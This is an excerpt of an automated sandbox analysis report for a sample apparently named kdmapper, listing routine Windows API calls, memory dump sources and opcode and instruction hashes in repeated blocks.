                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteFile$_wcslen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2643169976-0
                                                                                                                                                                          • Opcode ID: eeae2a7a772541ec79c0b1ac921407d5c28a15c48fac39f909ec671a22fcfb42
                                                                                                                                                                          • Instruction ID: 3bf0efed786a74624ac1fa0324c1c4155facae688eea74af61b74db12d326111
                                                                                                                                                                          • Opcode Fuzzy Hash: eeae2a7a772541ec79c0b1ac921407d5c28a15c48fac39f909ec671a22fcfb42
                                                                                                                                                                          • Instruction Fuzzy Hash: 8BE09231150329ABEB019F60EC45FD9375EAB087C2F484025B944D2190EB61DE84DE64
                                                                                                                                                                          APIs
                                                                                                                                                                          • GdiplusShutdown.GDIPLUS(?,?,?,?,00652641,000000FF), ref: 0063ACB0
                                                                                                                                                                          • CoUninitialize.COMBASE(?,?,?,?,00652641,000000FF), ref: 0063ACB5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: GdiplusShutdownUninitialize
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3856339756-0
                                                                                                                                                                          • Opcode ID: 01dcc6965517dd99709a2f8cfb3589a38bbe9215bee2432d95289bc8c744bde3
                                                                                                                                                                          • Instruction ID: 750d7a1c5f50e0a9c6d06a16d2bfc5021b769ca40b2d7317ff09a42b2be13ab2
                                                                                                                                                                          • Opcode Fuzzy Hash: 01dcc6965517dd99709a2f8cfb3589a38bbe9215bee2432d95289bc8c744bde3
                                                                                                                                                                          • Instruction Fuzzy Hash: BAE06D72644A50EFCB01DB59DC46B49FBAAFB88F20F00436AF456D37A0CB74AD00CA94
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,?,0062A23A,?,0062755C,?,?,?,?), ref: 0062A254
                                                                                                                                                                            • Part of subcall function 0062BB03: _wcslen.LIBCMT ref: 0062BB27
                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0062A23A,?,0062755C,?,?,?,?), ref: 0062A280
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AttributesFile$_wcslen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2673547680-0
                                                                                                                                                                          • Opcode ID: f2e89ff72063374f67a8ad4eaaac4a700f747f13d3f5e118d00d8f7f781aea4c
                                                                                                                                                                          • Instruction ID: 40af68ea0b2b31c10a9391e4163da8a81ca38aaf99b638feec72a57804cf3b80
                                                                                                                                                                          • Opcode Fuzzy Hash: f2e89ff72063374f67a8ad4eaaac4a700f747f13d3f5e118d00d8f7f781aea4c
                                                                                                                                                                          • Instruction Fuzzy Hash: D9E092315012349BCB50EB64DC05BD9775AAB087E2F044261FD54E32D0D771DE44CBE0
                                                                                                                                                                          APIs
                                                                                                                                                                          • _swprintf.LIBCMT ref: 0063DEEC
                                                                                                                                                                            • Part of subcall function 00624092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006240A5
                                                                                                                                                                          • SetDlgItemTextW.USER32(00000065,?), ref: 0063DF03
                                                                                                                                                                            • Part of subcall function 0063B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0063B579
                                                                                                                                                                            • Part of subcall function 0063B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0063B58A
                                                                                                                                                                            • Part of subcall function 0063B568: IsDialogMessageW.USER32(000303EC,?), ref: 0063B59E
                                                                                                                                                                            • Part of subcall function 0063B568: TranslateMessage.USER32(?), ref: 0063B5AC
                                                                                                                                                                            • Part of subcall function 0063B568: DispatchMessageW.USER32(?), ref: 0063B5B6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2718869927-0
                                                                                                                                                                          • Opcode ID: 52845177d649105ec867d46c4ccb2bbf011758354e47c452f65f69db069f4b21
                                                                                                                                                                          • Instruction ID: 4281c699f05a3827c89fb926f77612e6f7fcd0cb4cf09cd26116ea1c4a62624e
                                                                                                                                                                          • Opcode Fuzzy Hash: 52845177d649105ec867d46c4ccb2bbf011758354e47c452f65f69db069f4b21
                                                                                                                                                                          • Instruction Fuzzy Hash: CFE092B24003582ADF12AB71DC0AF9E3BAE5B05B85F041955F240DB1E2DE79EA508B65
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00630836
                                                                                                                                                                          • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0062F2D8,Crypt32.dll,00000000,0062F35C,?,?,0062F33E,?,?,?), ref: 00630858
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DirectoryLibraryLoadSystem
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1175261203-0
                                                                                                                                                                          • Opcode ID: a30263be07dd0182ac72132cb786d4412d75090a83aaff735c48f2c38a886e1c
                                                                                                                                                                          • Instruction ID: 15dce5c41d4d5eff97b1c4e6c559f1e6f6ca084416fe36f071d6b37ac8a1bd84
                                                                                                                                                                          • Opcode Fuzzy Hash: a30263be07dd0182ac72132cb786d4412d75090a83aaff735c48f2c38a886e1c
                                                                                                                                                                          • Instruction Fuzzy Hash: 33E0D8764002286BDF01A790DC04FDA77ADEF087C2F040065B605D2144D674DA84CBF4
                                                                                                                                                                          APIs
                                                                                                                                                                          • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0063A3DA
                                                                                                                                                                          • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0063A3E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: BitmapCreateFromGdipStream
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1918208029-0
                                                                                                                                                                          • Opcode ID: 2a5be5bc43930a739b7b0aeba78ad97e45522557cb1b2a5574e0cb556d07dbd5
                                                                                                                                                                          • Instruction ID: 1dfad1e546de0ad8cc2d906a9fcd75f65b0c9f2e89f791d58c9030ad1b63dd62
                                                                                                                                                                          • Opcode Fuzzy Hash: 2a5be5bc43930a739b7b0aeba78ad97e45522557cb1b2a5574e0cb556d07dbd5
                                                                                                                                                                          • Instruction Fuzzy Hash: 9AE0ED72500218EBDB50DF95C541B99BBE9EB04365F10805AE886D3241E774AE44DBA1
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00642BAA
                                                                                                                                                                          • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00642BB5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1660781231-0
                                                                                                                                                                          • Opcode ID: 76e4d8f180c43a54eb4b27c9ac818fc879830851c10b870afa84f3a747fb6a52
                                                                                                                                                                          • Instruction ID: 274a1d58387e15e5eb5df5588d029e9a29953eff2f2a6d9b1054c386d84e3e12
                                                                                                                                                                          • Opcode Fuzzy Hash: 76e4d8f180c43a54eb4b27c9ac818fc879830851c10b870afa84f3a747fb6a52
                                                                                                                                                                          • Instruction Fuzzy Hash: 45D022385A4323188F987E7039B34883B87ED42B7DBF0139EF83086FC1EE118080A219
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ItemShowWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3351165006-0
                                                                                                                                                                          • Opcode ID: 8055bc9b8cbfa8620604d80c2b8ae3a99bf6eaa912019cad432e17c767fb8d97
                                                                                                                                                                          • Instruction ID: 0d2f1a8718de849344a7558f560cc099225e26b34e0631095c088744ede04d76
                                                                                                                                                                          • Opcode Fuzzy Hash: 8055bc9b8cbfa8620604d80c2b8ae3a99bf6eaa912019cad432e17c767fb8d97
                                                                                                                                                                          • Instruction Fuzzy Hash: 0CC0123205C220BECB010BB4DC0DC2BBBAAABA5B12F04CA08B2E5C0260E238C110DB11
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3519838083-0
                                                                                                                                                                          • Opcode ID: fbb29a5840caecd6ad3ff7e07bfe3c3c5b5c45762de1e103520e214379a59066
                                                                                                                                                                          • Instruction ID: b57dc1951b3a9b1084c3c793c7ab09badd1c7403f589fbc2eae2c020a45a0e25
                                                                                                                                                                          • Opcode Fuzzy Hash: fbb29a5840caecd6ad3ff7e07bfe3c3c5b5c45762de1e103520e214379a59066
                                                                                                                                                                          • Instruction Fuzzy Hash: 73C1C530A08A649FEF15CF68D494BE97BA7AF26310F1805B9DC459F382DB309945CF61
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3519838083-0
                                                                                                                                                                          • Opcode ID: 05be9903a383f642b1399e7f4471353b596912212b227318e5d5d7e99821c97f
                                                                                                                                                                          • Instruction ID: d14c7e25e11ac3af2985a1fba2692c67c9e49fbb0c0ce9f7ceb574a33be0cece
                                                                                                                                                                          • Opcode Fuzzy Hash: 05be9903a383f642b1399e7f4471353b596912212b227318e5d5d7e99821c97f
                                                                                                                                                                          • Instruction Fuzzy Hash: B071BD71500FA49EDB25DB70D8519E7B7EAAF15301F41092EE2AB87342DB366A88CF11
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 00628289
                                                                                                                                                                            • Part of subcall function 006213DC: __EH_prolog.LIBCMT ref: 006213E1
                                                                                                                                                                            • Part of subcall function 0062A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0062A598
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog$CloseFind
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2506663941-0
                                                                                                                                                                          • Opcode ID: f35ef1e41f9188948294196a5cf675e31638cdbdc00a613f2f5c9f8c9778eeab
                                                                                                                                                                          • Instruction ID: 8f7411e30fe68f5777cafe041355990dd07286a94ea7518bee4e9818c02ff4b0
                                                                                                                                                                          • Opcode Fuzzy Hash: f35ef1e41f9188948294196a5cf675e31638cdbdc00a613f2f5c9f8c9778eeab
                                                                                                                                                                          • Instruction Fuzzy Hash: 9541A971945A789EDB20EBA0DC55AE9B3AAAF10304F0404EEE04A57183EB755FC5CF50
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 006213E1
                                                                                                                                                                            • Part of subcall function 00625E37: __EH_prolog.LIBCMT ref: 00625E3C
                                                                                                                                                                            • Part of subcall function 0062CE40: __EH_prolog.LIBCMT ref: 0062CE45
                                                                                                                                                                            • Part of subcall function 0062B505: __EH_prolog.LIBCMT ref: 0062B50A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3519838083-0
                                                                                                                                                                          • Opcode ID: 19cce41e369fe3e162a6f53e709d07c20a30fc710842e86c551a07643b51002e
                                                                                                                                                                          • Instruction ID: 7bbf2b1a2fc0226184a9940d9282cb7e0e688f005c2118c263ceda44f9d5ffde
                                                                                                                                                                          • Opcode Fuzzy Hash: 19cce41e369fe3e162a6f53e709d07c20a30fc710842e86c551a07643b51002e
                                                                                                                                                                          • Instruction Fuzzy Hash: 92414CB0905B409EE764DF398885AE6FBE6BF29300F50492ED5FF87282C7316654CB54
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 006213E1
                                                                                                                                                                            • Part of subcall function 00625E37: __EH_prolog.LIBCMT ref: 00625E3C
                                                                                                                                                                            • Part of subcall function 0062CE40: __EH_prolog.LIBCMT ref: 0062CE45
                                                                                                                                                                            • Part of subcall function 0062B505: __EH_prolog.LIBCMT ref: 0062B50A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3519838083-0
                                                                                                                                                                          • Opcode ID: a76f50f6bb6f40af15bf567cad55fb0b473afda30f9cb7d70156e27008a4dcfa
                                                                                                                                                                          • Instruction ID: cd244e9ebb64b1e083d6628b7a5cb7a76850bbe596a2530e84b79c42831c57fe
                                                                                                                                                                          • Opcode Fuzzy Hash: a76f50f6bb6f40af15bf567cad55fb0b473afda30f9cb7d70156e27008a4dcfa
                                                                                                                                                                          • Instruction Fuzzy Hash: C64169B0905B409EE724DF398885AE6FBE6BF29300F50492ED5FF87282CB312654CB54
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 0063B098
                                                                                                                                                                            • Part of subcall function 006213DC: __EH_prolog.LIBCMT ref: 006213E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3519838083-0
                                                                                                                                                                          • Opcode ID: 35d8c8c13990cc99bb07d9fad5b6d6fad88ad0ea7e605145990797d6b9742022
                                                                                                                                                                          • Instruction ID: 22500723814d5e0d9987aa0bb98892cf07095b1540f683d7a053ed02269c3895
                                                                                                                                                                          • Opcode Fuzzy Hash: 35d8c8c13990cc99bb07d9fad5b6d6fad88ad0ea7e605145990797d6b9742022
                                                                                                                                                                          • Instruction Fuzzy Hash: F131CD71C04219DECF15DF64D951AEEBBB6AF09300F1044AEE409B7242D735AF04CBA5
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00653A34), ref: 0064ACF8
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 190572456-0
                                                                                                                                                                          • Opcode ID: dd57bfea9f47f1b19bea26cae62bd7891625053c339d378bb03570ab883d5a37
                                                                                                                                                                          • Instruction ID: 03035385afe1462277ac8ec2221ec06dd140b8d77f22168e78cdefc48e9dbbcc
                                                                                                                                                                          • Opcode Fuzzy Hash: dd57bfea9f47f1b19bea26cae62bd7891625053c339d378bb03570ab883d5a37
